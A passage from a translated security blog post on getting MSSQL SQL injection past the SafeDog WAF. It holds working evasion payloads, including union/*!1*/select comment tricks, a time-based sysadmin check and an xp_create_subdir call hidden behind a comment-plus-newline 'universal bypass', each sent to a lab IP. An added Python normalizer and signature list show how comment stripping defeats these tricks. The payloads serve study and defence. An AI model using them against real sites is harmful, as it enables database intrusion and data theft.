    <li><p><code>unionselect    blocked</code></p></li>
   </ol>

It may feel hopeless, as if there is no way around it, but try comments, even though MSSQL has no inline comments.

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>union/*select*/    not blocked</code></p></li>
    <li><p><br></p></li>
    <li><p><code>union/*!select*/    blocked</code></p></li>
    <li><p><br></p></li>
    <li><p><code>union/*!1select*/    not blocked</code></p></li>
   </ol>

Let's try closing it and see whether it is still blocked.

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>union/*!1*/select--*/    not blocked</code></p></li>
   </ol>

Our final payload is now constructed.

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>http://192.168.130.137/1.aspx?id=1 union/*!1*/select null,name,null from [info]--*/</code></p></li>
   </ol>

0x03 Blind injection and stored procedures

Earlier we covered a MySQL bypass technique, a comment followed by a newline. It also holds in MSSQL, so we can build the payload directly.

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>http://192.168.130.137/1.aspx?id=1--/*%0aif (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--%20*/</code></p></li>
   </ol>

Stored procedures

   <ol class="linenums list-paddingleft-2" style="list-style-type: none;">
    <li><p><code>http://192.168.130.137/1.aspx?id=1--/*%0aexec xp_create_subdir 'c:\text'--%20*/</code></p></li>
   </ol>

You can treat this as a universal bypass statement: SafeDog will not block any code placed inside it.
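All three evasions in this article (the CHAR()/hex literal encoding, the union/*!1*/select comment trick, and the --/*%0a ... --%20*/ comment-plus-newline trick) work because the WAF matches raw request text. As an added example, not part of the original post, here is a Python normalizer that URL-decodes, removes comments the way the T-SQL parser does (one left-to-right scan, each comment acting as a token separator), decodes 0x and CHAR() literals, and only then matches simple signatures; the signature names and regexes are constructed for illustration and are not SafeDog's rules.

```python
"""Normalize a suspect query-string value before signature matching.

Added example, not code from the original post. Signatures are constructed
for illustration; the sample inputs are the payloads shown in the article.
"""
import re
from urllib.parse import unquote  # unquote keeps '+'; unquote_plus would turn it into a space

HEX_LIT = re.compile(r"\b0x([0-9a-fA-F]+)\b")
CHAR_CALL = re.compile(r"\bchar\s*\(\s*(\d{1,3})\s*\)", re.IGNORECASE)
CONCAT = re.compile(r"'([^']*)'\s*\+\s*'([^']*)'")

SIGNATURES = [
    ("union-select", re.compile(r"\bunion\s+(all\s+)?select\b")),
    ("schema-enum", re.compile(r"\bfrom\s+\[?(sysobjects|information_schema)\b")),
    ("time-based", re.compile(r"\bwaitfor\s+delay\b")),
    ("role-probe", re.compile(r"\bis_srvrolemember\s*\(")),
    ("xp-procedure", re.compile(r"\bexec(ute)?\s+(\w+\.\.)?xp_\w+")),
]


def strip_comments(sql):
    """Remove T-SQL comments with a single left-to-right scan, as the server does.

    A '/*' inside a '--' line comment opens nothing, string literals are copied
    verbatim so markers inside them are ignored, and every comment becomes one
    space because 'union/**/select' is two tokens to the server.
    """
    out, i, n = [], 0, len(sql)
    while i < n:
        two = sql[i:i + 2]
        if two == "--":
            j = sql.find("\n", i)
            i = n if j < 0 else j          # the newline itself survives as whitespace
            out.append(" ")
        elif two == "/*":
            depth, i = 1, i + 2            # T-SQL block comments nest
            while i < n and depth:
                if sql[i:i + 2] == "/*":
                    depth, i = depth + 1, i + 2
                elif sql[i:i + 2] == "*/":
                    depth, i = depth - 1, i + 2
                else:
                    i += 1
            out.append(" ")
        elif sql[i] == "'":
            j = i + 1
            while j < n and sql[j] != "'":
                j += 1
            out.append(sql[i:j + 1])
            i = j + 1
        else:
            out.append(sql[i])
            i += 1
    return "".join(out)


def _hex_to_literal(m):
    digits = m.group(1)
    if len(digits) % 2:
        return m.group(0)
    try:
        text = bytes.fromhex(digits).decode("ascii")
    except (ValueError, UnicodeDecodeError):
        return m.group(0)
    return "'" + text + "'" if text.isprintable() and "'" not in text else m.group(0)


def _char_to_literal(m):
    code = int(m.group(1))
    return "'" + chr(code) + "'" if 32 <= code <= 126 and code != 39 else m.group(0)


def normalize(raw):
    """Return a canonical, lower-cased form of a query-string value."""
    s = strip_comments(unquote(raw))        # decode first: %0a must become a real newline
    s = HEX_LIT.sub(_hex_to_literal, s)     # 0x75 -> 'u'
    s = CHAR_CALL.sub(_char_to_literal, s)  # CHAR(105) -> 'i'
    prev = None
    while prev != s:                        # 'i'+'n'+'f'+'o' -> 'info'
        prev, s = s, CONCAT.sub(r"'\1\2'", s)
    return re.sub(r"\s+", " ", s).strip().lower()


def naive_normalize(raw):
    """What a regex-first filter sees: block comments removed before line comments.

    Kept only to show why the --/*%0a ... --%20*/ trick evades such a filter.
    """
    s = re.sub(r"/\*.*?\*/", "", unquote(raw), flags=re.DOTALL)
    s = re.sub(r"--[^\n]*", "", s)
    return re.sub(r"\s+", " ", s).strip().lower()


def match_signatures(normalized):
    return [name for name, rx in SIGNATURES if rx.search(normalized)]


if __name__ == "__main__":
    # Constructed from the payloads shown in this article.
    samples = [
        "and ~1=(select top 1 name from [sysobjects] where xtype=0x75);--",
        "id=1 union/*!1*/select null,name,null from [info]--*/",
        "id=1--/*%0aif (select IS_SRVROLEMEMBER('sysadmin'))=1 WAITFOR DELAY '0:0:5'--%20*/",
        r"id=1--/*%0aexec xp_create_subdir 'c:\text'--%20*/",
    ]
    for raw in samples:
        print(f"naive={match_signatures(naive_normalize(raw))!s:<28} parsed={match_signatures(normalize(raw))}")
```

The regex-first variant reports nothing for the last two samples, which is exactly the gap the article's comment-plus-newline payloads exploit.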

__________________________________________________________

Disclaimer: this article comes from 404分享 and is provided only for white hats and security enthusiasts to study; the publisher and author take no responsibility for any use in illegal activities.
